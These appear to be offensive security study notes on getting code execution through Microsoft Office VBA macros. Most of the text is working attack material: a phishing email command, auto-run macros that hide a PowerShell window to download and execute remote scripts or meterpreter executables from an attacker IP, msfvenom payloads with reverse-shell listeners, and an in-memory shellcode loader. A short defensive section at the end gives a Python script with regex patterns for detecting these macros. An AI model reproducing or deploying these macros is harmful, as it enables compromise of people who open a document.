Client Side Code Execution

VBA Macro in MS Office

Send email

sendemail -f [email protected] -t [email protected] -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"

Run from Web Server through PowerShell In-Memory

kali host web server:
python -m http.server 80
scope = document
macro vba; scope = doc1
Sub MyMacro()
    Dim str As String
    str = "powershell -ep bypass -nop -c iex ((New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/rev.ps1'))"
    Shell str, vbHide
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
PowerShell Inside VBA

In-Memory Shellcode VBA Macro without .exe

VBA Shellcode:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication
listener:
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
macro vba; scope = doc1
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    buf = Array(232, 130, 0, 0, 0, 96, 137…)

    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

The shell dies when the document is closed; resolve this with the AutoMigrate module in MSF.

VBA AV Bypass

VBA .exe Shellcode Download & Execute on Disk

shell.exe to serve in kali:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe
listener:
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
kali host web server:
python -m http.server 80
macro vba; scope = doc1
Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/msfstaged.exe', 'msfstaged.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide

End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
IWR alternative MyMacro
Sub MyMacro()
    Dim str As String
    str = "powershell -c "IWR -Uri http://192.168.119.120/msfstaged.exe -OutFile C:\temp\msfstaged.exe"
    Shell str, vbHide
    Dim exePath As String
    exePath = "C:\temp\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide

End Sub
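
Detection view of the macros above, as an added example that is not part of the original notes: a static triage pass over extracted VBA source that flags the two shapes shown on this page (auto-run Shell plus PowerShell downloader, and auto-run Win32 memory API declarations). The rule names, verdict strings and sample macros are constructed for illustration; the samples use a placeholder host and contain no payload bytes.

```python
import re

F = re.IGNORECASE | re.MULTILINE
DECL = r"^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?Function\s+"
INDICATORS = {  # heuristics for the macro patterns shown on this page
    "auto_exec": re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:Document_Open|AutoOpen)\b", F),
    "shell_call": re.compile(r"^\s*Shell\s+\w", F),
    "powershell": re.compile(r"\bpowershell\b", F),
    "downloader": re.compile(r"\b(?:DownloadString|DownloadFile|IWR|Invoke-WebRequest)\b", F),
    "hidden_window": re.compile(r"\bvbHide\b", F),
    "native_api": re.compile(DECL + r"(VirtualAlloc|RtlMoveMemory|CreateThread)\b", F),
    "rwx_alloc": re.compile(r"VirtualAlloc\s*\(.*&H40\s*\)", F),  # &H40 = PAGE_EXECUTE_READWRITE
}

def triage(vba_source):
    """Return matched indicators and verdicts for one module's VBA source text."""
    # Drop whole-line comments so commented-out code does not trigger a rule.
    src = "\n".join(l for l in vba_source.splitlines() if not l.lstrip().startswith("'"))
    hits = {name for name, rx in INDICATORS.items() if rx.search(src)}
    apis = {m.group(1).lower() for m in INDICATORS["native_api"].finditer(src)}
    verdicts = []
    if {"auto_exec", "shell_call", "powershell", "downloader"} <= hits:
        verdicts.append("auto-run PowerShell download")
    if "auto_exec" in hits and {"virtualalloc", "createthread"} <= apis:
        verdicts.append("auto-run native code loader")
    return {"indicators": sorted(hits), "verdicts": verdicts}

# Constructed samples (placeholder host, shortened declarations, no payload bytes).
SAMPLE_CRADLE = """Sub MyMacro()
    Dim str As String
    str = "powershell -nop -c iex ((New-Object System.Net.WebClient).DownloadString('http://example.invalid/a.ps1'))"
    Shell str, vbHide
End Sub
Sub AutoOpen()
    MyMacro
End Sub"""
SAMPLE_LOADER = """Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal a As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal a As LongPtr) As LongPtr
Sub Document_Open()
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
End Sub"""
SAMPLE_BENIGN = """Sub AutoOpen()
    ' Shell "powershell ..." left here as a comment only
    MsgBox "Template loaded"
End Sub"""

if __name__ == "__main__":
    for name in ("SAMPLE_CRADLE", "SAMPLE_LOADER", "SAMPLE_BENIGN"):
        print(name, triage(globals()[name]))
```

The input is plain macro source, for example as dumped by olevba from oletools; string-splitting or other obfuscation in the macro will evade these literal patterns, so treat a clean result as inconclusive.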
